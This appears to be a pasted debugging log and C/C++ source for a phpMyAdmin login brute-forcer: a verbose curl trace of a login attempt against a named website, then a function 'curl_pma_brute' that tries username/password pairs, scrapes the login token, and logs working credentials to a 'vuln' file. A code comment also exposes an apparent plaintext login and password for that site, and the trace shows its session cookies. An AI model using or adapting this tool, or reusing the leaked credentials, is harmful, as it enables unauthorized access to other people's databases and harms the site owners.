> POST /phpMyAdmin-4.0.10.20-english/index.php HTTP/1.1Host: gangbangebony.com

1. > POST /phpMyAdmin-4.0.10.20-english/index.php HTTP/1.1
2. Host: gangbangebony.com
3. User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0
4. Accept: */*
5. Cookie: phpMyAdmin=n17vf2r3rc532vvpqkmhua4hh7; pma_lang=en; __cfduid=d68021a412017ac69cee2890ea0b1e4371537310970
6. Content-Length: 107
7. Content-Type: application/x-www-form-urlencoded
8.  
9. * upload completely sent off: 107 out of 107 bytes
10. < HTTP/1.1 302 Found
11. < Date: Tue, 18 Sep 2018 22:49:36 GMT
12. < Content-Type: text/html; charset=UTF-8
13. < Transfer-Encoding: chunked
14. < Connection: keep-alive
15. < Expires: Thu, 19 Nov 1981 08:52:00 GMT
16. < Cache-Control: private, max-age=10800
17. < Last-Modified: Wed, 29 Mar 2017 01:03:24 GMT
18. * Added cookie pmaUser-1="%7B%22iv%22%3A%22Df2rfm2qxuyQAB72T94Ofw%3D%3D%22%2C%22mac%22%3A%226f210573fbb3eac515408aa1f8494c31058caedc%22%2C%22payload%22%3A%226e92Bq1dmn0Wqb3v9WmKYg%3D%3D%22%7D" for domain gangbangebony.com, path /phpMyAdmin-4.0.10.20-english/, expire 1539893577
19. < Set-Cookie: pmaUser-1=%7B%22iv%22%3A%22Df2rfm2qxuyQAB72T94Ofw%3D%3D%22%2C%22mac%22%3A%226f210573fbb3eac515408aa1f8494c31058caedc%22%2C%22payload%22%3A%226e92Bq1dmn0Wqb3v9WmKYg%3D%3D%22%7D; expires=Thu, 18-Oct-2018 22:49:35 GMT; Max-Age=2592000; path=/phpMyAdmin-4.0.10.20-english/; HttpOnly
20. * Added cookie pmaAuth-1="%7B%22iv%22%3A%221eErqOJZ3Hnh1uCuZaHZxQ%3D%3D%22%2C%22mac%22%3A%22f7e8be1ef302580aa119ec92e92f79e89176e033%22%2C%22payload%22%3A%220SgFKBMEBJg7DznBj8%5C%2FR8gL6eXVvGxzDYyKOCRVMuhlQQexB80iuDXewqNoan9Tc%22%7D" for domain gangbangebony.com, path /phpMyAdmin-4.0.10.20-english/, expire 0
21. < Set-Cookie: pmaAuth-1=%7B%22iv%22%3A%221eErqOJZ3Hnh1uCuZaHZxQ%3D%3D%22%2C%22mac%22%3A%22f7e8be1ef302580aa119ec92e92f79e89176e033%22%2C%22payload%22%3A%220SgFKBMEBJg7DznBj8%5C%2FR8gL6eXVvGxzDYyKOCRVMuhlQQexB80iuDXewqNoan9Tc%22%7D; path=/phpMyAdmin-4.0.10.20-english/; HttpOnly
22. < X-ob_mode: 0
23. < Location: https://gangbangebony.com:80/phpMyAdmin-4.0.10.20-english/index.php?token=c91128b32c2eba468c76105237a238d8
24. < Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
25. < Server: cloudflare
26. < CF-RAY: 45c75dd93b019cb9-AMS
27. <
28. * Ignoring the response-body
29. * Connection #0 to host gangbangebony.com left intact
30. * Issue another request to this URL: 'https://gangbangebony.com:80/phpMyAdmin-4.0.10.20-english/index.php?token=c91128b32c2eba468c76105237a238d8'
31. * Switch from POST to GET
32. * Found bundle for host gangbangebony.com: 0x1decdc0 [can pipeline]
33. * Trying 104.27.153.115...
34. * TCP_NODELAY set
35. * Connected to gangbangebony.com (104.27.153.115) port 80 (#1)
36. * ALPN, offering http/1.1
37. * Cipher selection: ALL:!EXPORT:!EXPORT40:!EXPORT56:!aNULL:!LOW:!RC4:@STRENGTH
38. * successfully set certificate verify locations:
39. * CAfile: /etc/ssl/certs/ca-certificates.crt
40. CApath: none
41. * error:1408F10B:SSL routines:ssl3_get_record:wrong version number
42. * Closing connection 1
43. curl_easy_perform() failed: SSL connect error
44. RES1=[0]
45.  
46.  
47.  
48.  
49.  
50. int curl_pma_brute(char* url, char* user, char* pass, int debug_curl)
51. {
52. /*
53. curl_version_info_data *d = curl_version_info(CURLVERSION_NOW);
54. puts(d->version);
55. puts(d->libssh_version);
56. puts(d->ssl_version);
57. exit(0);
58. */
59.  
60. int result = 0;
61. CURL *curl_handle;
62. CURLcode res;
63.  
64. struct MemoryStruct chunk;
65. char* curl_error;
66. struct curl_slist *chunk_headers = NULL;
67. char chunk_temp[4096];
68.  
69. curl_global_init(CURL_GLOBAL_ALL);
70. chunk.memory = (char*) malloc(1);
71. chunk.size = 0;
72.  
73. // CURL1
74. curl_handle = curl_easy_init();
75. curl_easy_setopt(curl_handle, CURLOPT_URL, url);
76. curl_easy_setopt(curl_handle, CURLOPT_FOLLOWLOCATION, 1L); // caused problems
77.  
78. curl_easy_setopt(curl_handle, CURLOPT_TIMEOUT, timeout);
79. curl_easy_setopt(curl_handle, CURLOPT_CONNECTTIMEOUT, timeout);
80.  
81. curl_easy_setopt(curl_handle, CURLOPT_WRITEFUNCTION, WriteMemoryCallback);
82. curl_easy_setopt(curl_handle, CURLOPT_WRITEDATA, (void *)&chunk);
83.  
84. curl_easy_setopt(curl_handle, CURLOPT_USERAGENT,USERAGENT);
85. // curl_easy_setopt(curl_handle, CURLOPT_CONNECT_TO,host);
86.  
87. /*
88. memset(chunk_temp,0,sizeof(chunk_temp));
89. sprintf(chunk_temp,"Host: %s",original_host);
90. chunk_headers = curl_slist_append(chunk_headers, chunk_temp);
91. curl_easy_setopt(curl_handle, CURLOPT_HTTPHEADER, chunk_headers);
92. */
93.  
94. curl_easy_setopt(curl_handle, CURLOPT_HEADER, 1l);
95.  
96. curl_easy_setopt(curl_handle, CURLOPT_SSL_VERIFYHOST, 0l);
97. curl_easy_setopt(curl_handle, CURLOPT_SSL_VERIFYPEER,0l);
98. // curl_easy_setopt(curl_handle, CURLOPT_USE_SSL, 0l);
99. // curl_easy_setopt(curl_handle, CURLOPT_SSLVERSION, CURL_SSLVERSION_MAX_TLSv1_2);
100. // curl_easy_setopt(curl_handle, CURLOPT_SSL_CIPHER_LIST,"RC4-SHA");
101. // curl_easy_setopt(curl_handle, CURLOPT_SSL_CIPHER_LIST, "TLSv1");
102.  
103. curl_easy_setopt(curl_handle, CURLOPT_COOKIEFILE, "");
104.  
105. if(debug_curl >=3) curl_easy_setopt(curl_handle, CURLOPT_VERBOSE, 1);
106.  
107. // curl_easy_setopt(curl_handle, CURLOPT_FAILONERROR, 1L);
108. // curl_easy_setopt(curl_handle, CURLOPT_UPLOAD, 1L);
109. char user_pass[500];
110. memset(user_pass,0,sizeof(user_pass));
111. sprintf(user_pass,"%s:%s",user,pass);
112.  
113. curl_easy_setopt(curl_handle, CURLOPT_HTTPAUTH, CURLAUTH_ANY);
114. curl_easy_setopt(curl_handle, CURLOPT_USERPWD,user_pass);
115.  
116. // wp_porn:mywebsitepornnetwork32123@gangbangebony.com/phpMyAdmin-4.8.3-all-languages/
117. // curl -vvv -k -u 'wp_porn:mywebsitepornnetwork32123' -H 'Accept: application/json' 'https://gangbangebony.com/phpMyAdmin-4.8.3-all-languages/' --trace-ascii - -X PROPFIND -D -
118.  
119. res = curl_easy_perform(curl_handle);
120.  
121. if(res != CURLE_OK)
122. {
123. curl_error = (char*) curl_easy_strerror(res);
124.  
125. if(debug_curl >=3) fprintf(stderr, "curl_easy_perform() failed: %s\n",curl_error);
126. }
127. else
128. {
129. if(debug_curl >=3) printf("%lu bytes retrieved\n", (long)chunk.size);
130.  
131. if(debug_curl >=3) puts(chunk.memory);
132.  
133. if(strstr(chunk.memory,"HTTP/1.1 200 OK") && strstr(chunk.memory,"themes/pmahomme/img/logo_left.png"))
134. {
135. result = 1;
136.  
137. char temp_filename_line[500];
138. memset(temp_filename_line,0,500);
139. sprintf(temp_filename_line,"%s:%s:%s\n",url,user,pass);
140. file_put_contents("vuln",temp_filename_line,"FILE_APPEND");
141. }
142.  
143.  
144. else if(strstr(chunk.memory,"HTTP/1.1 200 OK") && strstr(chunk.memory,"name=\"pma_username\"") && strstr(chunk.memory,"name=\"pma_password\""))
145. {
146. std::string s1(chunk.memory);
147. string delimiter1 = "name=\"token\"";
148. string token1 = s1.substr(52, s1.find(delimiter1)); // token is "scott"
149. token1 = s1.substr(s1.find(delimiter1)+20,32);
150.  
151. // it is a box, post it
152. curl_easy_setopt(curl_handle, CURLOPT_URL, url);
153. curl_easy_setopt(curl_handle, CURLOPT_FOLLOWLOCATION, 1L); // caused problems
154.  
155. curl_easy_setopt(curl_handle, CURLOPT_TIMEOUT, timeout);
156. curl_easy_setopt(curl_handle, CURLOPT_CONNECTTIMEOUT, timeout);
157.  
158. curl_easy_setopt(curl_handle, CURLOPT_WRITEFUNCTION, WriteMemoryCallback);
159. curl_easy_setopt(curl_handle, CURLOPT_WRITEDATA, (void *)&chunk);
160.  
161. curl_easy_setopt(curl_handle, CURLOPT_USERAGENT,USERAGENT);
162. // curl_easy_setopt(curl_handle, CURLOPT_CONNECT_TO,host);
163.  
164. curl_easy_setopt(curl_handle, CURLOPT_HEADER, 1l);
165.  
166. curl_easy_setopt(curl_handle, CURLOPT_SSL_VERIFYHOST, 0l);
167. curl_easy_setopt(curl_handle, CURLOPT_SSL_VERIFYPEER,0l);
168. // curl_easy_setopt(curl_handle, CURLOPT_USE_SSL, 0l);
169. // curl_easy_setopt(curl_handle, CURLOPT_SSLVERSION, CURL_SSLVERSION_MAX_TLSv1_2);
170. // curl_easy_setopt(curl_handle, CURLOPT_SSL_CIPHER_LIST, "TLSv1");
171.  
172.  
173. curl_easy_setopt(curl_handle, CURLOPT_COOKIEFILE, "");
174.  
175. char post_string[500];
176. memset(post_string,0,500);
177. sprintf(post_string,"pma_username=%s&pma_password=%s&server=%s&token=%s",user,pass,"1",token1.c_str());
178.  
179. curl_easy_setopt(curl_handle,CURLOPT_POSTFIELDS,post_string);
180.  
181. if(debug_curl >=3) curl_easy_setopt(curl_handle, CURLOPT_VERBOSE, 1);
182.  
183. res = curl_easy_perform(curl_handle);
184.  
185. if(res != CURLE_OK)
186. {
187. curl_error = (char*) curl_easy_strerror(res);
188.  
189. if(debug_curl >=3) fprintf(stderr, "curl_easy_perform() failed: %s\n",curl_error);
190. }
191. else
192. {
193. if(debug_curl >=3) printf("%lu bytes retrieved\n", (long)chunk.size);
194.  
195. if(debug_curl >=3) puts(chunk.memory);
196.  
197. if(strstr(chunk.memory,"HTTP/1.1 200 OK") && strstr(chunk.memory,"themes/pmahomme/img/logo_left.png"))
198. {
199. result = 1;
200.  
201. char temp_filename_line[500];
202. memset(temp_filename_line,0,500);
203. sprintf(temp_filename_line,"%s:%s:%s\n",url,user,pass);
204. file_put_contents("vuln",temp_filename_line,"FILE_APPEND");
205. }
206.  
207. }
208. }
209.  
210.  
211.  
212. }
213.  
214. curl_easy_cleanup(curl_handle);
215.  
216. free(chunk.memory);
217.  
218. curl_global_cleanup();
219.  
220. return result;
221. }